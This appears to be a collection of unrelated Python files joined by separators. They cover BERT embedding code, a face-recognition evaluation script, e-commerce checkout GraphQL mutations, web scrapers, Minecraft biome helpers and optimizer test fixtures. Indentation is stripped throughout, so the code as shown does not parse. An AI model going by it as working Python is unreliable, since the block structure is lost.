kwargs['trainable'] = params.tune_bert
return getter(name, *args, **kwargs)
with tf.variable_scope("bert", custom_getter=custom_getter):
# handling sequence embeddings: token_embedding pls segment embedding pls positional embedding
embed_initializer = tf.truncated_normal_initializer(stddev=params.bert.initializer_range)
with tf.variable_scope("embeddings"):
word_embedding = tf.get_variable(
name="word_embeddings",
shape=[params.bert.vocab.size, params.bert.hidden_size],
initializer=embed_initializer
)
seq_embed = tf.nn.embedding_lookup(word_embedding, sequence)
segment_embedding = tf.get_variable(
name="token_type_embeddings",
shape=[2, params.bert.hidden_size],
initializer=embed_initializer
)
seg_embed = tf.nn.embedding_lookup(segment_embedding, seg_ids)
# word embedding + segment embedding
seq_embed = seq_embed + seg_embed
# add position embedding
assert_op = tf.assert_less_equal(seq_length, params.bert.max_position_embeddings)
with tf.control_dependencies([assert_op]):
position_embedding = tf.get_variable(
name="position_embeddings",
shape=[params.bert.max_position_embeddings, params.bert.hidden_size],
initializer=embed_initializer
)
pos_embed = position_embedding[:seq_length]
seq_embed = seq_embed + tf.expand_dims(pos_embed, 0)
# post-processing, layer norm and segmentation
seq_embed = tc.layers.layer_norm(
inputs=seq_embed, begin_norm_axis=-1, begin_params_axis=-1)
seq_embed = util.valid_apply_dropout(seq_embed, params.bert.hidden_dropout_prob)
bert_outputs = []
# handling sequence encoding with transformer encoder
with tf.variable_scope("encoder"):
attention_mask = encoder.create_attention_mask_from_input_mask(
sequence, seq_mask)
# Run the stacked transformer.
# `sequence_output` shape = [batch_size, seq_length, hidden_size].
all_encoder_layers = encoder.transformer_model(
input_tensor=seq_embed,
attention_mask=attention_mask,
hidden_size=params.bert.hidden_size,
num_hidden_layers=params.bert.num_hidden_layers,
num_attention_heads=params.bert.num_attention_heads,
intermediate_size=params.bert.intermediate_size,
intermediate_act_fn=encoder.get_activation(params.bert.hidden_act),
hidden_dropout_prob=params.bert.hidden_dropout_prob,
attention_probs_dropout_prob=params.bert.attention_probs_dropout_prob,
initializer_range=params.bert.initializer_range,
do_return_all_layers=True)
sequence_output = all_encoder_layers
bert_outputs.append(sequence_output)
if params.use_bert_single:
# The "pooler" converts the encoded sequence tensor of shape
# [batch_size, seq_length, hidden_size] to a tensor of shape
# [batch_size, hidden_size]. This is necessary for segment-level
# (or segment-pair-level) classification tasks where we need a fixed
# dimensional representation of the segment.
with tf.variable_scope("pooler"):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token. We assume that this has been pre-trained
first_token_tensor = tf.squeeze(sequence_output[-1][:, 0:1, :], axis=1)
pooled_output = tf.layers.dense(
first_token_tensor,
params.bert.hidden_size,
activation=tf.tanh,
kernel_initializer=embed_initializer)
bert_outputs.append(pooled_output)
return bert_outputs
def bert_feature(layer_features, scope=None):
with tf.variable_scope(scope or "fuse_bert_seq_feature"):
layer_features = [tf.expand_dims(feature, 0) for feature in layer_features]
layer_features = tf.concat(layer_features, 0)
layer_logits = tf.layers.dense(layer_features, 1)
layer_weights = tf.nn.softmax(layer_logits, 0)
layer_feature = tf.reduce_sum(layer_weights * layer_features, 0)
return layer_feature
|
import os, sys, shutil
import struct as st
import numpy as np
from scipy import spatial
from sklearn import metrics
from scipy.optimize import fsolve
from scipy.interpolate import interp1d
from sklearn.metrics.pairwise import cosine_similarity
def load_meta_data(meta_file, sub_dir):
meta_data = dict()
with open(meta_file, 'r') as in_f:
in_f.readline() # the first line is not data
for idx, line in enumerate(in_f):
record = line.strip().split(',')
template, class_id = int(record[0]), int(record[1])
img_path = '{}/{}.jpg'.format(sub_dir,idx+1)
if template not in meta_data:
meta_data[template] = ( class_id, [img_path,] )
else:
meta_data[template][1].append(img_path)
return meta_data
def load_feat(list_file, bin_file):
mid_feats = dict()
with open(list_file, 'r') as list_f, open(bin_file, 'rb') as bin_f:
(data_num, feat_dim) = st.unpack('ii', bin_f.read(8))
for line in list_f:
record = line.strip().split('/')
img_name = '/'.join(record[-2:])
feat = np.array(st.unpack('f'*feat_dim, bin_f.read(4*feat_dim)))
mid_feats[img_name] = feat
return mid_feats, feat_dim
def update_meta_data(meta_data, feats, feat_dim):
new_meta_data = dict()
for template in meta_data.keys():
class_id, img_names = meta_data[template]
feat = np.zeros(feat_dim)
feat_num = 0
for img_name in img_names:
if img_name in feats:
feat += feats[img_name]
feat_num += 1
#else:
#print(img_name)
if feat_num > 0: feat /= feat_num
if feat_num > 0: new_meta_data[template] = (class_id, feat)
return new_meta_data
def get_top(probe, gallery_data):
score_info = list()
probe_id, probe_feat = probe
for template in gallery_data.keys():
gallery_id, gallery_feat = gallery_data[template]
score = 1-spatial.distance.cosine(probe_feat, gallery_feat)
score_info.append((gallery_id, score))
score_info = sorted(score_info, key=lambda a:a[1], reverse=True)
top5_id = [item[0] for item in score_info[:5]]
return top5_id
def eval_recog(probe_data, gallery_data):
gallery_ids = set()
for template in gallery_data.keys():
gallery_ids.add(gallery_data[template][0])
top1_num, top5_num, tot_num = 0, 0, 0
for template in probe_data.keys():
class_id = probe_data[template][0]
if class_id not in gallery_ids: continue
top5_id = get_top(probe_data[template], gallery_data)
if class_id==top5_id[0]:
top1_num += 1
top5_num += 1
elif class_id in top5_id:
top5_num += 1
tot_num += 1
return top1_num/tot_num, top5_num/tot_num
def test_recog(model_type):
#model_type = 'resnet18'
protocol_dir = '../../data/IJBA/protocol_1N'
align_img_dir = '../../data/IJBA/align_image_1N'
split_num = 10
top1s, top5s = list(), list()
for split in range(1, split_num+1):
# load meta data first
split_protocol_dir = os.path.join(protocol_dir, 'split{}'.format(split))
#split_img_dir = os.path.join(align_img_dir, 'split{}'.format(split))
probe_file = os.path.join(split_protocol_dir, 'search_probe_{}.csv'.format(split))
probe_data = load_meta_data(probe_file, 'probe')
gallery_file = os.path.join(split_protocol_dir, 'search_gallery_{}.csv'.format(split))
gallery_data = load_meta_data(gallery_file, 'gallery')
# load extract feat
feats = dict()
feat_dim = 0
split_img_dir = os.path.join(align_img_dir, 'split{}'.format(split))
for img_type in ['gallery', 'probe']:
list_file = os.path.join(split_img_dir, '{}_list.txt'.format(img_type))
bin_file = os.path.join(split_img_dir, '{}_{}_feat.bin'.format(model_type, img_type))
mid_feats, feat_dim = load_feat(list_file, bin_file)
feats.update(mid_feats)
# update meta data
probe_data = update_meta_data(probe_data, feats, feat_dim)
gallery_data = update_meta_data(gallery_data, feats, feat_dim)
top1, top5 = eval_recog(probe_data, gallery_data)
top1s.append(top1)
top5s.append(top5)
print('split {}, top1: {}, top5: {}'.format(split,top1,top5))
print('top1: {} +/- {}'.format(np.mean(top1s), np.std(top1s)))
print('top5: {} +/- {}'.format(np.mean(top5s), np.std(top5s)))
return np.mean(top1s), np.std(top1s), np.mean(top5s), np.std(top5s)
if __name__ == '__main__':
test_recog(model_type='resnet50')
|
import graphene
from django.db import transaction
from ...checkout import models
from ...checkout.utils import (
add_variant_to_cart, change_billing_address_in_cart,
change_shipping_address_in_cart, create_order, get_taxes_for_cart,
ready_to_place_order)
from ...core import analytics
from ...core.exceptions import InsufficientStock
from ...core.utils.taxes import get_taxes_for_address
from ...payment import PaymentError
from ...payment.utils import gateway_authorize, gateway_capture, gateway_void
from ...shipping.models import ShippingMethod as ShippingMethodModel
from ..account.i18n import I18nMixin
from ..account.types import AddressInput, User
from ..core.mutations import BaseMutation, ModelMutation
from ..core.types.common import Error
from ..order.types import Order
from ..product.types import ProductVariant
from ..shipping.types import ShippingMethod
from .types import Checkout, CheckoutLine
def clean_shipping_method(
checkout, method, errors, discounts, taxes, country_code=None,
remove=True):
# FIXME Add tests for this function
if not method:
return errors
if not checkout.is_shipping_required():
errors.append(
Error(
field='checkout',
message='This checkout does not requires shipping.'))
if not checkout.shipping_address:
errors.append(
Error(
field='checkout',
message=(
'Cannot choose a shipping method for a '
'checkout without the shipping address.')))
return errors
valid_methods = (
ShippingMethodModel.objects.applicable_shipping_methods(
price=checkout.get_subtotal(discounts, taxes).gross.amount,
weight=checkout.get_total_weight(),
country_code=country_code or checkout.shipping_address.country.code
))
valid_methods = valid_methods.values_list('id', flat=True)
if method.pk not in valid_methods and not remove:
errors.append(
Error(
field='shippingMethod',
message='Shipping method cannot be used with this checkout.'))
if remove:
checkout.shipping_method = None
checkout.save(update_fields=['shipping_method'])
return errors
def check_lines_quantity(variants, quantities):
"""Check if stock is sufficient for each line in the list of dicts.
Return list of errors.
"""
errors = []
for variant, quantity in zip(variants, quantities):
try:
variant.check_quantity(quantity)
except InsufficientStock as e:
message = (
'Could not add item '
+ '%(item_name)s. Only %(remaining)d remaining in stock.' % {
'remaining': e.item.quantity_available,
'item_name': e.item.display_product()})
errors.append(('quantity', message))
return errors
class CheckoutLineInput(graphene.InputObjectType):
quantity = graphene.Int(
description='The number of items purchased.')
variant_id = graphene.ID(description='ID of the ProductVariant.')
class CheckoutCreateInput(graphene.InputObjectType):
lines = graphene.List(
CheckoutLineInput,
description=(
'A list of checkout lines, each containing information about '
'an item in the checkout.'))
email = graphene.String(description='The customer\'s email address.')
shipping_address = AddressInput(
description=(
'The mailling address to where the checkout will be shipped.'))
class CheckoutCreate(ModelMutation, I18nMixin):
class Arguments:
input = CheckoutCreateInput(
required=True, description='Fields required to create a Checkout.')
class Meta:
description = 'Create a new Checkout.'
model = models.Cart
return_field_name = 'checkout'
@classmethod
def clean_input(cls, info, instance, input, errors):
cleaned_input = super().clean_input(info, instance, input, errors)
lines = input.pop('lines', None)
if lines:
variant_ids = [line.get('variant_id') for line in lines]
variants = cls.get_nodes_or_error(
ids=variant_ids, errors=errors, field='variant_id',
only_type=ProductVariant)
quantities = [line.get('quantity') for line in lines]
line_errors = check_lines_quantity(variants, quantities)
if line_errors:
for err in line_errors:
cls.add_error(errors, field=err[0], message=err[1])
else:
cleaned_input['variants'] = variants
cleaned_input['quantities'] = quantities
shipping_address_data = input.pop('shipping_address', None)
if shipping_address_data:
shipping_address, errors = cls.validate_address(
shipping_address_data, errors)
cleaned_input['shipping_address'] = shipping_address
return cleaned_input
@classmethod
def save(cls, info, instance, cleaned_input):
shipping_address = cleaned_input.get('shipping_address')
if shipping_address:
shipping_address.save()
instance.shipping_address = shipping_address
super().save(info, instance, cleaned_input)
instance.save(update_fields=['shipping_address'])
variants = cleaned_input.get('variants')
quantities = cleaned_input.get('quantities')
if variants and quantities:
for variant, quantity in zip(variants, quantities):
add_variant_to_cart(instance, variant, quantity)
class CheckoutLinesAdd(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated Checkout.')
class Arguments:
checkout_id = graphene.ID(
description='The ID of the Checkout.', required=True)
lines = graphene.List(
CheckoutLineInput,
required=True,
description=(
'A list of checkout lines, each containing information about '
'an item in the checkout.'))
class Meta:
description = 'Adds a checkout line to the existing checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, lines, replace=False):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
variants, quantities = None, None
if checkout is not None:
if lines:
variant_ids = [line.get('variant_id') for line in lines]
variants = cls.get_nodes_or_error(
ids=variant_ids, errors=errors, field='variant_id',
only_type=ProductVariant)
quantities = [line.get('quantity') for line in lines]
line_errors = check_lines_quantity(variants, quantities)
if line_errors:
for err in line_errors:
cls.add_error(errors, field=err[0], message=err[1])
# FIXME test if below function is called
clean_shipping_method(
checkout=checkout, method=checkout.shipping_method,
errors=errors, discounts=info.context.discounts,
taxes=get_taxes_for_address(checkout.shipping_address))
if errors:
return CheckoutLinesAdd(errors=errors)
if variants and quantities:
for variant, quantity in zip(variants, quantities):
add_variant_to_cart(
checkout, variant, quantity, replace=replace)
return CheckoutLinesAdd(checkout=checkout, errors=errors)
class CheckoutLinesUpdate(CheckoutLinesAdd):
checkout = graphene.Field(Checkout, description='An updated Checkout.')
class Meta:
description = 'Updates CheckoutLine in the existing Checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, lines):
return super().mutate(root, info, checkout_id, lines, replace=True)
class CheckoutLineDelete(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout.')
class Arguments:
checkout_id = graphene.ID(
description='The ID of the Checkout.', required=True)
line_id = graphene.ID(
description='ID of the CheckoutLine to delete.')
class Meta:
description = 'Deletes a CheckoutLine.'
@classmethod
def mutate(cls, root, info, checkout_id, line_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
line = cls.get_node_or_error(
info, line_id, errors, 'line_id', only_type=CheckoutLine)
if line and line in checkout.lines.all():
line.delete()
# FIXME test if below function is called
clean_shipping_method(
checkout=checkout, method=checkout.shipping_method, errors=errors,
discounts=info.context.discounts,
taxes=get_taxes_for_address(checkout.shipping_address))
if errors:
return CheckoutLineDelete(errors=errors)
return CheckoutLineDelete(checkout=checkout, errors=errors)
class CheckoutCustomerAttach(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout.')
class Arguments:
checkout_id = graphene.ID(
required=True, description='ID of the Checkout.')
customer_id = graphene.ID(
required=True, description='The ID of the customer.')
class Meta:
description = 'Sets the customer as the owner of the Checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, customer_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
customer = cls.get_node_or_error(
info, customer_id, errors, 'customer_id', only_type=User)
if checkout is not None and customer:
checkout.user = customer
checkout.save(update_fields=['user'])
return CheckoutCustomerAttach(checkout=checkout, errors=errors)
class CheckoutCustomerDetach(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='Checkout ID', required=True)
class Meta:
description = 'Removes the user assigned as the owner of the checkout.'
@classmethod
def mutate(cls, root, info, checkout_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if checkout is not None and not checkout.user:
cls.add_error(
errors, field=None,
message='There\'s no customer assigned to this Checkout.')
if errors:
return CheckoutCustomerDetach(errors=errors)
checkout.user = None
checkout.save(update_fields=['user'])
return CheckoutCustomerDetach(checkout=checkout)
class CheckoutShippingAddressUpdate(BaseMutation, I18nMixin):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='ID of the Checkout.')
shipping_address = AddressInput(
description=(
'The mailling address to where the checkout will be shipped.'))
class Meta:
description = 'Update shipping address in the existing Checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, shipping_address):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if checkout is not None:
shipping_address, errors = cls.validate_address(
shipping_address, errors, instance=checkout.shipping_address)
clean_shipping_method(
checkout, checkout.shipping_method, errors,
info.context.discounts,
get_taxes_for_address(shipping_address))
if errors:
CheckoutShippingAddressUpdate(errors=errors)
if shipping_address:
with transaction.atomic():
shipping_address.save()
change_shipping_address_in_cart(checkout, shipping_address)
return CheckoutShippingAddressUpdate(checkout=checkout, errors=errors)
class CheckoutBillingAddressUpdate(CheckoutShippingAddressUpdate):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='ID of the Checkout.')
billing_address = AddressInput(
description=(
'The billing address of the checkout.'))
class Meta:
description = 'Update billing address in the existing Checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, billing_address):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if billing_address:
billing_address, errors = cls.validate_address(
billing_address, errors, instance=checkout.billing_address)
if errors:
return CheckoutBillingAddressUpdate(errors=errors)
if checkout is not None and billing_address:
with transaction.atomic():
billing_address.save()
change_billing_address_in_cart(checkout, billing_address)
return CheckoutShippingAddressUpdate(checkout=checkout, errors=errors)
class CheckoutEmailUpdate(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='Checkout ID')
email = graphene.String(required=True, description='email')
class Meta:
description = 'Updates email address in the existing Checkout object.'
@classmethod
def mutate(cls, root, info, checkout_id, email):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if checkout is not None:
checkout.email = email
checkout.save(update_fields=['email'])
return CheckoutEmailUpdate(checkout=checkout, errors=errors)
class CheckoutShippingMethodUpdate(BaseMutation):
checkout = graphene.Field(Checkout, description='An updated checkout')
class Arguments:
checkout_id = graphene.ID(description='Checkout ID')
shipping_method_id = graphene.ID(
required=True, description='Shipping method')
class Meta:
description = 'Updates the shipping address of the checkout.'
@classmethod
def mutate(cls, root, info, checkout_id, shipping_method_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
shipping_method = cls.get_node_or_error(
info, shipping_method_id, errors, 'shipping_method_id',
only_type=ShippingMethod)
if checkout is not None and shipping_method:
clean_shipping_method(
checkout, shipping_method, errors, info.context.discounts,
info.context.taxes, remove=False)
if errors:
return CheckoutShippingMethodUpdate(errors=errors)
checkout.shipping_method = shipping_method
checkout.save(update_fields=['shipping_method'])
return CheckoutShippingMethodUpdate(checkout=checkout, errors=errors)
class CheckoutComplete(BaseMutation):
order = graphene.Field(Order, description='Placed order')
class Arguments:
checkout_id = graphene.ID(description='Checkout ID')
class Meta:
description = (
'Completes the checkout, creates an order from it and '
'charges the customer\'s funding source.')
@classmethod
def mutate(cls, root, info, checkout_id):
errors = []
checkout = cls.get_node_or_error(
info, checkout_id, errors, 'checkout_id', only_type=Checkout)
if checkout is None:
return CheckoutComplete(errors=errors)
taxes = get_taxes_for_cart(checkout, info.context.taxes)
ready, checkout_error = ready_to_place_order(
checkout, taxes, info.context.discounts)
if not ready:
cls.add_error(field=None, message=checkout_error, errors=errors)
return CheckoutComplete(errors=errors)
try:
order = create_order(
cart=checkout,
tracking_code=analytics.get_client_id(info.context),
discounts=info.context.discounts, taxes=taxes)
except InsufficientStock:
order = None
cls.add_error(
field=None, message='Insufficient product stock.',
errors=errors)
payment = checkout.payments.filter(is_active=True).first()
# FIXME there could be a situation where order was created but payment
# failed. we should cancel/delete the order at this moment I think
# authorize payment
try:
gateway_authorize(payment, payment.token)
except PaymentError as exc:
msg = str(exc)
cls.add_error(field=None, message=msg, errors=errors)
return CheckoutComplete(order=order, errors=errors)
# capture payment
try:
gateway_capture(payment, payment.total)
except PaymentError as exc:
msg = str(exc)
cls.add_error(field=None, message=msg, errors=errors)
# Void payment if the capture failed
gateway_void(payment)
return CheckoutComplete(order=order, errors=errors)
|
from vpngate import VPNGate
from datetime import datetime
# Edit it to use with mirror site
vpngate_base_url = "https://www.vpngate.net"
# csv output file
csv_file_path = "output/udp"
sleep_time = 0
vpngate = VPNGate(vpngate_base_url, csv_file_path, sleep_time)
start_time = datetime.now()
print("Script start at: {0}\n".format(start_time))
vpngate.run()
end_time = datetime.now()
print("Script finish at: {0}\n".format(end_time))
running_time = end_time - start_time
print("Running in {0} seconds".format(running_time.total_seconds()))
|
from danniesMovies.wsgi import application
|
from BiomeSettings import biomeSettings
from BiomeMapping import biome_map
# gets the name of the biome, if the biome is not supported, returns 'Plains' biome
def get_biome_name(biome):
for key, value in biome_map.items():
if biome in value:
return key
return 'Plains'
# getters for various biome specific blocks
def get_wall_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['wall']
def get_floor_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['floor']
def get_fence_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['fence']
def get_road_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['road']
def get_door_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['door']
def get_window_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['window']
def get_beam_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['beam']
def get_hedge_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['hedge']
def get_roof_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['roof']
def get_crop_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['crop']
def get_soil_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['soil']
def get_bridge_block(biome=1):
biomeName = get_biome_name(biome)
return biomeSettings[biomeName]['bridge']
|
from enum import Enum
class HelpMessages(Enum):
ADD = 'Add '
CONTRIBUTING_FILE = 'a standart Contributing File'
|
# import torch.nn as nn
#
# from ...ops.pointnet2.pointnet2_stack import pointnet2_modules as pointnet2_stack_modules
# from ...utils import common_utils
# from .roi_head_template import RoIHeadTemplate
#
#
# class PVRCNNHead(RoIHeadTemplate):
# def __init__(self, input_channels, model_cfg, num_class=1):
# super().__init__(num_class=num_class, model_cfg=model_cfg)
# self.model_cfg = model_cfg
#
# mlps = self.model_cfg.ROI_GRID_POOL.MLPS
# for k in range(len(mlps)):
# mlps[k] = [input_channels] + mlps[k]
#
# self.roi_grid_pool_layer = pointnet2_stack_modules.StackSAModuleMSG(
# radii=self.model_cfg.ROI_GRID_POOL.POOL_RADIUS,
# nsamples=self.model_cfg.ROI_GRID_POOL.NSAMPLE,
# mlps=mlps,
# use_xyz=True,
# pool_method=self.model_cfg.ROI_GRID_POOL.POOL_METHOD,
# )
#
# GRID_SIZE = self.model_cfg.ROI_GRID_POOL.GRID_SIZE
# c_out = sum([x[-1] for x in mlps])
# pre_channel = GRID_SIZE * GRID_SIZE * GRID_SIZE * c_out
#
# shared_fc_list = []
# for k in range(0, self.model_cfg.SHARED_FC.__len__()):
# shared_fc_list.extend([
# nn.Conv1d(pre_channel, self.model_cfg.SHARED_FC[k], kernel_size=1, bias=False),
# nn.BatchNorm1d(self.model_cfg.SHARED_FC[k]),
# nn.ReLU()
# ])
# pre_channel = self.model_cfg.SHARED_FC[k]
#
# if k != self.model_cfg.SHARED_FC.__len__() - 1 and self.model_cfg.DP_RATIO > 0:
# shared_fc_list.append(nn.Dropout(self.model_cfg.DP_RATIO))
#
# self.shared_fc_layer = nn.Sequential(*shared_fc_list)
#
# self.cls_layers = self.make_fc_layers(
# input_channels=pre_channel, output_channels=self.num_class, fc_list=self.model_cfg.CLS_FC
# )
# self.reg_layers = self.make_fc_layers(
# input_channels=pre_channel,
# output_channels=self.box_coder.code_size * self.num_class,
# fc_list=self.model_cfg.REG_FC
# )
# self.init_weights(weight_init='xavier')
#
# def init_weights(self, weight_init='xavier'):
# if weight_init == 'kaiming':
# init_func = nn.init.kaiming_normal_
# elif weight_init == 'xavier':
# init_func = nn.init.xavier_normal_
# elif weight_init == 'normal':
# init_func = nn.init.normal_
# else:
# raise NotImplementedError
#
# for m in self.modules():
# if isinstance(m, nn.Conv2d) or isinstance(m, nn.Conv1d):
# if weight_init == 'normal':
# init_func(m.weight, mean=0, std=0.001)
# else:
# init_func(m.weight)
# if m.bias is not None:
# nn.init.constant_(m.bias, 0)
# nn.init.normal_(self.reg_layers[-1].weight, mean=0, std=0.001)
#
# def roi_grid_pool(self, batch_dict):
# """
# Args:
# batch_dict:
# batch_size:
# rois: (B, num_rois, 7 + C)
# point_coords: (num_points, 4) [bs_idx, x, y, z]
# point_features: (num_points, C)
# point_cls_scores: (N1 + N2 + N3 + ..., 1)
# point_part_offset: (N1 + N2 + N3 + ..., 3)
# Returns:
#
# """
# batch_size = batch_dict['batch_size']
# rois = batch_dict['rois']
# point_coords = batch_dict['point_coords']
# point_features = batch_dict['point_features']
#
# point_features = point_features * batch_dict['point_cls_scores'].view(-1, 1)
#
# global_roi_grid_points, local_roi_grid_points = self.get_global_grid_points_of_roi(
# rois, grid_size=self.model_cfg.ROI_GRID_POOL.GRID_SIZE
# ) # (BxN, 6x6x6, 3)
# global_roi_grid_points = global_roi_grid_points.view(batch_size, -1, 3) # (B, Nx6x6x6, 3)
#
# xyz = point_coords[:, 1:4]
# xyz_batch_cnt = xyz.new_zeros(batch_size).int()
# batch_idx = point_coords[:, 0]
# for k in range(batch_size):
# xyz_batch_cnt[k] = (batch_idx == k).sum()
#
# new_xyz = global_roi_grid_points.view(-1, 3)
# new_xyz_batch_cnt = xyz.new_zeros(batch_size).int().fill_(global_roi_grid_points.shape[1])
# pooled_points, pooled_features = self.roi_grid_pool_layer(
# xyz=xyz.contiguous(),
# xyz_batch_cnt=xyz_batch_cnt,
# new_xyz=new_xyz,
# new_xyz_batch_cnt=new_xyz_batch_cnt,
# features=point_features.contiguous(),
# ) # (M1 + M2 ..., C)
#
# pooled_features = pooled_features.view(
# -1, self.model_cfg.ROI_GRID_POOL.GRID_SIZE ** 3,
# pooled_features.shape[-1]
# ) # (BxN, 6x6x6, C)
# return pooled_features
#
# def get_global_grid_points_of_roi(self, rois, grid_size):
# rois = rois.view(-1, rois.shape[-1])
# batch_size_rcnn = rois.shape[0]
#
# local_roi_grid_points = self.get_dense_grid_points(rois, batch_size_rcnn, grid_size) # (B, 6x6x6, 3)
# global_roi_grid_points = common_utils.rotate_points_along_z(
# local_roi_grid_points.clone(), rois[:, 6]
# ).squeeze(dim=1)
# global_center = rois[:, 0:3].clone()
# global_roi_grid_points += global_center.unsqueeze(dim=1)
# return global_roi_grid_points, local_roi_grid_points
#
# @staticmethod
# def get_dense_grid_points(rois, batch_size_rcnn, grid_size):
# faked_features = rois.new_ones((grid_size, grid_size, grid_size))
# dense_idx = faked_features.nonzero() # (N, 3) [x_idx, y_idx, z_idx]
# dense_idx = dense_idx.repeat(batch_size_rcnn, 1, 1).float() # (B, 6x6x6, 3)
#
# local_roi_size = rois.view(batch_size_rcnn, -1)[:, 3:6]
# roi_grid_points = (dense_idx + 0.5) / grid_size * local_roi_size.unsqueeze(dim=1) \
# - (local_roi_size.unsqueeze(dim=1) / 2) # (B, 6x6x6, 3)
# return roi_grid_points
#
# def forward(self, batch_dict):
# """
# :param input_data: input dict
# :return:
# """
#
# targets_dict = self.proposal_layer(
# batch_dict, nms_config=self.model_cfg.NMS_CONFIG['TRAIN' if self.training else 'TEST']
# )
# if self.training:
# targets_dict = self.assign_targets(batch_dict)
# batch_dict['rois'] = targets_dict['rois']
# batch_dict['roi_labels'] = targets_dict['roi_labels']
#
# # RoI aware pooling
# pooled_features = self.roi_grid_pool(batch_dict) # (BxN, 6x6x6, C)
#
# grid_size = self.model_cfg.ROI_GRID_POOL.GRID_SIZE
# batch_size_rcnn = pooled_features.shape[0]
# pooled_features = pooled_features.permute(0, 2, 1).\
# contiguous().view(batch_size_rcnn, -1, grid_size, grid_size, grid_size) # (BxN, C, 6, 6, 6)
#
# shared_features = self.shared_fc_layer(pooled_features.view(batch_size_rcnn, -1, 1))
# rcnn_cls = self.cls_layers(shared_features).transpose(1, 2).contiguous().squeeze(dim=1) # (B, 1 or 2)
# rcnn_reg = self.reg_layers(shared_features).transpose(1, 2).contiguous().squeeze(dim=1) # (B, C)
#
# if not self.training:
# batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
# batch_size=batch_dict['batch_size'], rois=batch_dict['rois'], cls_preds=rcnn_cls, box_preds=rcnn_reg
# )
# batch_dict['batch_cls_preds'] = batch_cls_preds
# batch_dict['batch_box_preds'] = batch_box_preds
# batch_dict['cls_preds_normalized'] = False
# else:
# targets_dict['rcnn_cls'] = rcnn_cls
# targets_dict['rcnn_reg'] = rcnn_reg
#
# self.forward_ret_dict = targets_dict
#
# return batch_dict
|
import requests
from bs4 import BeautifulSoup as soup
import re
import urllib3
import urllib
import time
# url = 'https://film-grab.com/category/1-371/' #4
# url = 'https://film-grab.com/category/2-001/' #1
# url = 'https://film-grab.com/category/2-201/' #1
# url = 'https://film-grab.com/category/1-751/' #1
# url = 'https://film-grab.com/category/2-351/' # 12
#url = 'https://film-grab.com/category/1-661/' #3
#url = 'https://film-grab.com/category/1-781/' #1
url = 'https://film-grab.com/category/1-851/' #12
def source_img(url):
links = []
for x in range(1, 13, 1):
txt = url+'page/'+str(x)+'/'
links.append(txt)
links[0] = url
# links.append(url) # for singe processing use this line and comment out the for loop
for l in links:
page = requests.get(l)
html = soup(page.text, 'html.parser')
result = html.find_all(attrs={'class':'popup-image'})
result[0].find_all('img')[0].get('data-large-file')
img_links = []
title = []
for each in result:
img_links.append(each.find_all('img')[0].get('data-large-file'))
title.append(each.find_all('img')[0].get('data-image-title'))
for url in img_links:
filename = url.split('/')[-1]
r = requests.get(url, allow_redirects=True)
time.sleep(3)
open('images/movie_pics/'+filename, 'wb').write(r.content)
source_img(url)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Common fixtures and utils for unittests and functional tests."""
import os
from pymongo import MongoClient
import pytest
import yaml
from orion.algo.base import (BaseAlgorithm, OptimizationAlgorithm)
class DumbAlgo(BaseAlgorithm):
"""Stab class for `BaseAlgorithm`."""
def __init__(self, space, value=5,
scoring=0, judgement=None,
suspend=False, done=False, **nested_algo):
"""Configure returns, allow for variable variables."""
self._times_called_suspend = 0
self._times_called_is_done = 0
self._num = None
self._points = None
self._results = None
self._score_point = None
self._judge_point = None
self._measurements = None
super(DumbAlgo, self).__init__(space, value=value,
scoring=scoring, judgement=judgement,
suspend=suspend,
done=done,
**nested_algo)
def suggest(self, num=1):
"""Suggest based on `value`."""
self._num = num
return [self.value] * num
def observe(self, points, results):
"""Log inputs."""
self._points = points
self._results = results
def score(self, point):
"""Log and return stab."""
self._score_point = point
return self.scoring
def judge(self, point, measurements):
"""Log and return stab."""
self._judge_point = point
self._measurements = measurements
return self.judgement
@property
def should_suspend(self):
"""Cound how many times it has been called and return `suspend`."""
self._times_called_suspend += 1
return self.suspend
@property
def is_done(self):
"""Cound how many times it has been called and return `done`."""
self._times_called_is_done += 1
return self.done
# Hack it into being discoverable
OptimizationAlgorithm.types.append(DumbAlgo)
OptimizationAlgorithm.typenames.append(DumbAlgo.__name__.lower())
